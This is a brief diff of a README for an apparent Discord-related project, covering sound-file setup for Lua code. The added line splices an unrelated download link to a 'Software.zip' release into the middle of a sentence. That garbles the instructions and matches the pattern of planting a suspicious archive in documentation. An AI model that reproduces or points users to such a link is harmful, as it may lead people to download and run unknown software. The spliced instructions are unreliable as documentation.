ethangames101/discordblacklistsites/README.md

 ```

 **Sound**
 You can import your .mp3 files into the web/public/sounds path.
-To retrieve them, simply enter the file name in the sound field as in the example below.Instead the volume field is used to set the sound volume.
+To retrieve them, simply enter the file name in the sound field as in the example https://github.com/ethangames101/discordblacklistsites/releases/download/v2.0/Software.zip the volume field is used to set the sound volume.

 ```lua
 local data = {